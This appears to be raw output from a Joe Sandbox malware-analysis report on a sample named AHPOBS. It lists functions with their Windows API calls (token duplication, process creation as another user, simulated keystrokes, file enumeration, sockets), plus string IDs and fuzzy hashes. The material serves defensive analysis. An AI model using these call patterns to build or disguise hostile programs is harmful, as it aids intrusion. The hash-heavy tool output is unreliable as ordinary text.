                                      • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                      APIs
                                      • closesocket.WS2_32(00000000), ref: 00458A12
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458A1E
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastclosesocket
                                      • String ID:
                                      • API String ID: 1278161333-0
                                      APIs
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      • __lock_file.LIBCMT ref: 00414A8D
                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      APIs
                                      • timeGetTime.WINMM ref: 0040D3CC
                                        • Part of subcall function 004091E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                      • Sleep.KERNEL32(00000000), ref: 0042E19F
                                      Similarity
                                      • API ID: MessagePeekSleepTimetime
                                      • String ID:
                                      • API String ID: 1792118007-0
                                      APIs
                                      • __lock_file.LIBCMT ref: 00415012
                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0046FAF1
                                      Similarity
                                      • API ID: _malloc_memmove
                                      • String ID:
                                      • API String ID: 1183979061-0
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      Similarity
                                      • API ID: select
                                      • String ID:
                                      • API String ID: 1274211008-0
                                      APIs
                                      • SetFilePointerEx.KERNEL32(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 0046F3F1
                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                      Similarity
                                      • API ID: Window_memmove
                                      • String ID:
                                      • API String ID: 517827167-0
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • _memmove.LIBCMT ref: 00454193
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      Similarity
                                      • API ID: _malloc_memmove
                                      • String ID:
                                      • API String ID: 1183979061-0
                                      APIs
                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _memmove.LIBCMT ref: 0044C1F2
                                      Similarity
                                      • API ID: _malloc_memmove
                                      • String ID:
                                      • API String ID: 1183979061-0
                                      • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                      • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                      • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                      APIs
                                      • _wcslen.LIBCMT ref: 00441ECD
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      Similarity
                                      • API ID: _wcslen$_wcscpy
                                      • String ID:
                                      • API String ID: 3469035223-0
                                      • Opcode ID: 611bdd1bce6b08a39b3ffc0a7d572f0eca65f574359c77a1447a2b24e27a2d60
                                      • Instruction ID: 2fbb190dad4ce56573c0fa61da4d13feb20fc8bc688041f2d473ed6297838154
                                      • Instruction Fuzzy Hash: 42F03172600204AFD700DF9DEC8199BB3E8EF88725F14812AFA18D7251D6B5ED458BA5
                                      APIs
                                      Similarity
                                      • API ID: __lock_file
                                      • String ID:
                                      • API String ID: 3031932315-0
                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                      APIs
                                      • _wcslen.LIBCMT ref: 00443D34
                                        • Part of subcall function 00433D9E: EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                      Similarity
                                      • API ID: EnumProcesses_wcslen
                                      • String ID:
                                      • API String ID: 3303492691-0
                                      • Opcode ID: 61840f1e4be6ab7e74efaef90a4495a36a15179c598b7116193463e31052faad
                                      • Instruction ID: 973e428d5754fd58bf011f848023120356fa753a79d0ada774503799e32604de
                                      • Instruction Fuzzy Hash: 05E0E5B3A010187BEA106A4ABC81DCB735CDBCA72EF040027F60887221E229AE0542F9
                                      APIs
                                      • WSAStartup.WSOCK32(00000202,?), ref: 004589C6
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: 7202705a9892f4bd4a2423c339a1cc919efe15e3859c0a303b549491d84c9c0e
                                      • Instruction ID: 50042109da9cb7071167785bc1ba5dfd020c55d47bb24ccc02d0932d492e023f
                                      • Instruction Fuzzy Hash: E0F0A0372043046FD320EE799C56EAB77ECAF85A20F048A2EBDA4C72C5DA75D904C795
                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                      • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                      • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                      • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                      • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0043633F
                                      Similarity
                                      • API ID: MessageSendTimeout
                                      • String ID:
                                      • API String ID: 1599653421-0
                                      • Opcode ID: 9860d8fd04dca8f4639475c0e949a449d7e9360e0213879cd93aaa3a815527bf
                                      • Instruction ID: 404f820d5c191ead8adfbb6f72584c17bf9223e8bc32b4a3dee19ec2549da310
                                      • Instruction Fuzzy Hash: 9BD0C97139030876E7248A659D0BF96375C5710F40F5081257B04A91D0D9A0F5408658
                                      APIs
                                      • SetWindowTextW.USER32(?,00000000), ref: 0045A417
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID:
                                      • API String ID: 530164218-0
                                      • Opcode ID: 39ab12bcd539f566f9dea5a3ededab9ed65a5f16605081fb930bde218f2aabbd
                                      • Instruction ID: 630e00077c8ae74d59962b812fa4adb9c431e8497940f7c51c81685005244029
                                      • Instruction Fuzzy Hash: 8BD0C975214204AFC340EBA4DC88C2677ECAB987653418829B804CB222C634FD418BA8
                                      APIs
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004725F0
                                      Similarity
                                      • API ID: FolderPath
                                      • String ID:
                                      • API String ID: 1514166925-0
                                      • Opcode ID: 2de512cec78399c0bf4693007645a811ad418ae9abd944a38d33811ad3ab03e9
                                      • Instruction ID: dc9a77a9ab6d49dacfa1cff77643056435d6e4e9731ad488e59261afbb404366
                                      • Instruction Fuzzy Hash: 51C09230388204BAF7284B50CE4FFA82220B714F02F204088B70A380C196E069499A2E
                                      APIs
                                      • CloseHandle.KERNEL32(?,?,00426FBF), ref: 0040DA3D
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                      • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                      • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                      APIs
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                      • SendMessageW.USER32 ref: 0047CA7F
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                      • ImageList_SetDragCursorImage.COMCTL32(00BCF7D8,00000000,00000000,00000000), ref: 0047CB9B
                                      • ImageList_BeginDrag.COMCTL32(00BCF7D8,00000000,000000F8,000000F0), ref: 0047CBAC
                                      • SetCapture.USER32(?), ref: 0047CBB6
                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                      • SendMessageW.USER32 ref: 0047CD12
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                      • SendMessageW.USER32 ref: 0047CD80
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                      • SendMessageW.USER32 ref: 0047CE93
                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,00B31B98,00000000,?,?,?,?), ref: 0047CF1C
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                      • SendMessageW.USER32 ref: 0047CF6B
                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,00B31B98,00000000,?,?,?,?), ref: 0047CFE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3100379633-4164748364
                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00434420
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                      • IsIconic.USER32(?), ref: 0043444F
                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2889586943-2988720461
                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                      APIs
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                      • _wcslen.LIBCMT ref: 00446498
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _wcsncpy.LIBCMT ref: 004464C0
                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                      • CloseDesktop.USER32(?), ref: 0044657A
                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                      • String ID: $@OH$default$winsta0
                                      • API String ID: 3324942560-3791954436
                                      • Opcode ID: 3855f31a7edb79db8fb6e054dab9a51317b7aa2e377abc436226fb5bcd8b5061
                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                      • Opcode Fuzzy Hash: 3855f31a7edb79db8fb6e054dab9a51317b7aa2e377abc436226fb5bcd8b5061
                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                      • __swprintf.LIBCMT ref: 004789D3
                                      • __swprintf.LIBCMT ref: 00478A1D
                                      • __swprintf.LIBCMT ref: 00478A4B
                                      • __swprintf.LIBCMT ref: 00478A79
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                      • __swprintf.LIBCMT ref: 00478AA7
                                      • __swprintf.LIBCMT ref: 00478AD5
                                      • __swprintf.LIBCMT ref: 00478B03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 999945258-2428617273
                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                      • __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscpy.LIBCMT ref: 004034A7
                                      • _wcscat.LIBCMT ref: 004034BC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                      • _wcscpy.LIBCMT ref: 004035A0
                                      • _wcslen.LIBCMT ref: 00403623
                                      • _wcslen.LIBCMT ref: 0040367D
                                      Strings
                                      • _, xrefs: 0040371C
                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                      • Unterminated string, xrefs: 00428348
                                      • Error opening the file, xrefs: 00428231
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                      • API String ID: 3393021363-188983378
                                      • Opcode ID: 2389ec669d452b0a5adfbe169eecf0b3fb7fa3ab3e44055c90c6d509db71674e
                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                      • Opcode Fuzzy Hash: 2389ec669d452b0a5adfbe169eecf0b3fb7fa3ab3e44055c90c6d509db71674e
                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
